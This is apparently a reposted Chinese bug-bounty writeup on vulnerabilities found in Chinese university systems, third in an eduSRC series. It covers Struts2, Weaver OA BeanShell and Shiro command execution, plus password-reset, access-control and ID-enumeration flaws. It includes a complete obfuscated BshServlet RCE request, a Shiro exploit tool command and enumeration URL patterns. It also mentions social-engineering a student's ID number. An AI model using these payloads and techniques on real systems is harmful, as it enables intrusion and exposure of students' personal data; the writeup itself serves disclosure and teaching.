当前位置:   article > 正文

eduSRC那些事儿-3(命令执行类+越权逻辑类)

eduSRC那些事儿-3(命令执行类+越权逻辑类)

本文对edusrc挖掘的部分漏洞进行整理,将案例脱敏后输出成文章,不包含0DAY/BYPASS的案例过程,仅对挖掘思路和方法进行相关讲解。

命令执行类

St2命令执行

在电量查询手机管理平台,观察到.do或.action后缀,

http://xxx:8080/mobile/mobile!login.action

图片

通过工具检测存在struts2-046漏洞,

图片

判断存在system系统权限,

图片

直接getshell和执行任意命令。

第三方应用命令执行

泛微OA Bsh 远程代码执行漏洞为例:

通过个人经验或者cms识别工具判断目标的CMS类型,

http://xxx:8080/login/Login.jsp?logintype=1

图片

先验证漏洞:

http://xxx/weaver/bsh.servlet.BshServlet

可以执行任意函数,

图片

然后上burpsuite,发送以下数据包:

POST /weaver/bsh.servlet.BshServlet HTTP/1.1

Host: xxx:8080

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 98

Content-Type: application/x-www-form-urlencoded

bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

图片

成功获取root权限,实现任意命令执行。

Shiro远程命令执行 

某大学宿舍管理系统存在apache shiro反序列化:在登录页面时,提交表单后发现set-cookie存在remeberMe=deleteMe字样。

exp:

https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip

如图:

java -jar shiro_tool.jar http://xxx.edu.cn/

图片

Key已经爆破成功,使用xray的shrio插件或者shiro_attack_1.5使用构造链即可执行任意命令。

越权逻辑类

密码重置

初次登陆需要更改密码,但未验证原始密码,

图片

利用审查元素或抓包更改学号为其他人的,成功重置他人密码,

图片

管理功能未限制权限访问

先获取高权限用户权限,然后将高权限用户接口放到低权限用户上访问对其没有限制,如:

对全校学生进行管理,泄露数万学生个人敏感信息,

http://xxx.edu.cn/xxx/student_new/query.jsp?cdbh=xxx

图片

直接重置系统任意单位用户密码,

http://xxx/xxx/xxx/xxxPassword.jsp

图片

个人照片遍历

直接查看照片链接,是否存在参数或文件名称可猜解(包含学号、工号、ID值等信息),遍历即可获取所有个人照片。如:

1、参数遍历:

http://xxx.edu.cn/Common/ResourceReq.ashx?t=stupic&i=学号 ......

图片

2、文件名遍历:

http://xxx.edu.cn/attachments/ds_photo/工号.jpg http://xxx/xg/vfs/vfs.do?path=年份/STD_INFO/RXZP/学号.jpg ......

学工系统遍历学号

社工获取某学校学姐身份证号加学号等个人敏感信息,登录学工系统,在学工系统个人信息查看功能抓包,获取到以下接口,

图片

通过修改学号获取个人相关敏感信息。

某大学体温上报系统,

图片

抓包更改接口,泄露密码、学号、身份证号、手机号、学院专业等信息。

图片

过往推文:

eduSRC那些事儿-2(sql注入类+文件上传类)

eduSRC那些事儿-1(信息泄露+弱口令)

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家自动化/article/detail/891816
推荐阅读
相关标签
  

闽ICP备14008679号